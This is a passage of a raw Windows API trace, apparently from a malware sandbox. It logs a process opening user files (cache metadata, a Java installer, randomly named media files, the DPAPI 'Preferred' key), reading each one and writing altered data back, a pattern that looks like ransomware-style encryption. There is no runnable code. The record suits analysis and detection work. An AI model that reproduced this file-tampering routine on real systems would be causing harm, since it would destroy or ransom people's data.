dwMilliseconds=0xffffffff) returned 0x0 [0156.833] ReleaseMutex (hMutex=0x168) returned 1 [0156.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0156.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cchWideChar=65, lpMultiByteStr=0x1fac974, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpUsedDefaultChar=0x0) returned 65 [0156.833] ReadFile (in: hFile=0x1d4, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x194, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2b1f2bc*=0x194, lpOverlapped=0x0) returned 1 [0156.834] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0156.834] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x71c, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2b1f2d0*=0x71c, lpOverlapped=0x0) returned 1 [0156.834] CloseHandle (hObject=0x1d4) returned 1 [0156.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.322] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0158.328] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x186 [0158.328] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0158.335] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.335] ReleaseMutex (hMutex=0x168) returned 1 [0158.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0158.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpUsedDefaultChar=0x0) returned 65 [0158.346] ReadFile (in: hFile=0x1dc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2b1f2bc*=0x186, lpOverlapped=0x0) returned 1 [0158.347] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0158.348] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x70e, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2b1f2d0*=0x70e, lpOverlapped=0x0) returned 1 [0158.348] CloseHandle (hObject=0x1dc) returned 1 [0158.348] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.349] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0158.349] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x156 [0158.350] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0158.350] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.350] ReleaseMutex (hMutex=0x168) returned 1 [0158.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="94308059B57B3142E455B38A6EB92015", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0158.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="94308059B57B3142E455B38A6EB92015", cchWideChar=32, lpMultiByteStr=0x1fa53fc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="94308059B57B3142E455B38A6EB92015", lpUsedDefaultChar=0x0) returned 32 [0158.350] ReadFile (in: hFile=0x1dc, lpBuffer=0x26a8c68, nNumberOfBytesToRead=0x156, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a8c68*, lpNumberOfBytesRead=0x2b1f2bc*=0x156, lpOverlapped=0x0) returned 1 [0158.352] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0158.352] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x6de, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2b1f2d0*=0x6de, lpOverlapped=0x0) returned 1 [0158.352] CloseHandle (hObject=0x1dc) returned 1 [0158.353] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.353] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0158.354] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1a0 [0158.354] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0158.354] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.354] ReleaseMutex (hMutex=0x168) returned 1 [0158.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0158.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpUsedDefaultChar=0x0) returned 65 [0158.354] ReadFile (in: hFile=0x1dc, lpBuffer=0x25af228, nNumberOfBytesToRead=0x1a0, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25af228*, lpNumberOfBytesRead=0x2b1f2bc*=0x1a0, lpOverlapped=0x0) returned 1 [0158.356] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0158.356] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x728, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2b1f2d0*=0x728, lpOverlapped=0x0) returned 1 [0158.356] CloseHandle (hObject=0x1dc) returned 1 [0158.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0159.353] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0159.353] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1a4 [0159.353] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0159.353] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.353] ReleaseMutex (hMutex=0x168) returned 1 [0159.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0159.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpUsedDefaultChar=0x0) returned 65 [0159.354] ReadFile (in: hFile=0x1d8, lpBuffer=0x25af228, nNumberOfBytesToRead=0x1a4, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25af228*, lpNumberOfBytesRead=0x2b1f2bc*=0x1a4, lpOverlapped=0x0) returned 1 [0159.355] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0159.355] WriteFile (in: hFile=0x1d8, lpBuffer=0x28956c8*, nNumberOfBytesToWrite=0x72c, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28956c8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x72c, lpOverlapped=0x0) returned 1 [0159.355] CloseHandle (hObject=0x1d8) returned 1 [0159.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0159.357] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0159.357] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xdd600 [0159.357] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0159.357] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.358] ReleaseMutex (hMutex=0x168) returned 1 [0159.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jre1.7.0_45.msi", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0159.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jre1.7.0_45.msi", cchWideChar=15, lpMultiByteStr=0x1f7340c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jre1.7.0_45.msi", lpUsedDefaultChar=0x0) returned 15 [0159.358] ReadFile (in: hFile=0x1d8, lpBuffer=0x27ec5a8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.361] ReadFile (in: hFile=0x1d8, lpBuffer=0x27ec5a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0159.362] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xdc600 [0159.362] ReadFile (in: hFile=0x1d8, lpBuffer=0x280b608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x280b608*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0159.364] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xdc600 [0159.365] WriteFile (in: hFile=0x1d8, lpBuffer=0x280d668*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x280d668*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0159.365] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0159.365] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0159.365] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0159.366] CloseHandle (hObject=0x1d8) returned 1 [0159.366] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B6NOvqD.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b6novqd.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0159.367] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0159.367] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xd187 [0159.367] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0159.367] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.367] ReleaseMutex (hMutex=0x168) returned 1 [0159.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B6NOvqD.mp4", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0159.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B6NOvqD.mp4", cchWideChar=11, lpMultiByteStr=0x1f735ac, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B6NOvqD.mp4", lpUsedDefaultChar=0x0) returned 11 [0159.367] ReadFile (in: hFile=0x1d8, lpBuffer=0x280d668, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x280d668*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0159.369] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xc187 [0159.369] ReadFile (in: hFile=0x1d8, lpBuffer=0x280d668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x280d668*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0159.369] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xc187 [0159.369] WriteFile (in: hFile=0x1d8, lpBuffer=0x28525c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28525c8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0159.369] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0159.370] WriteFile (in: hFile=0x1d8, lpBuffer=0x2848438*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2848438*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0159.370] CloseHandle (hObject=0x1d8) returned 1 [0159.384] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HgaTZRKrrrg.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hgatzrkrrrg.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0159.384] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0159.384] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xd03b [0159.385] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0159.385] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.385] ReleaseMutex (hMutex=0x168) returned 1 [0159.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HgaTZRKrrrg.avi", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0159.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HgaTZRKrrrg.avi", cchWideChar=15, lpMultiByteStr=0x1f7340c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HgaTZRKrrrg.avi", lpUsedDefaultChar=0x0) returned 15 [0159.385] ReadFile (in: hFile=0x1d8, lpBuffer=0x280d668, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x280d668*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0159.386] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xc03b [0159.387] ReadFile (in: hFile=0x1d8, lpBuffer=0x280d668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x280d668*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0159.387] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xc03b [0159.387] WriteFile (in: hFile=0x1d8, lpBuffer=0x28525c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28525c8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0159.387] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0159.387] WriteFile (in: hFile=0x1d8, lpBuffer=0x2848438*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2848438*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0159.388] CloseHandle (hObject=0x1d8) returned 1 [0159.388] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0159.665] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0159.665] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x18 [0159.665] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0159.666] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.666] ReleaseMutex (hMutex=0x168) returned 1 [0159.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Preferred", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0159.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Preferred", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Preferred", lpUsedDefaultChar=0x0) returned 9 [0159.666] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x2b1f2bc*=0x18, lpOverlapped=0x0) returned 1 [0159.667] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0159.667] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a0, 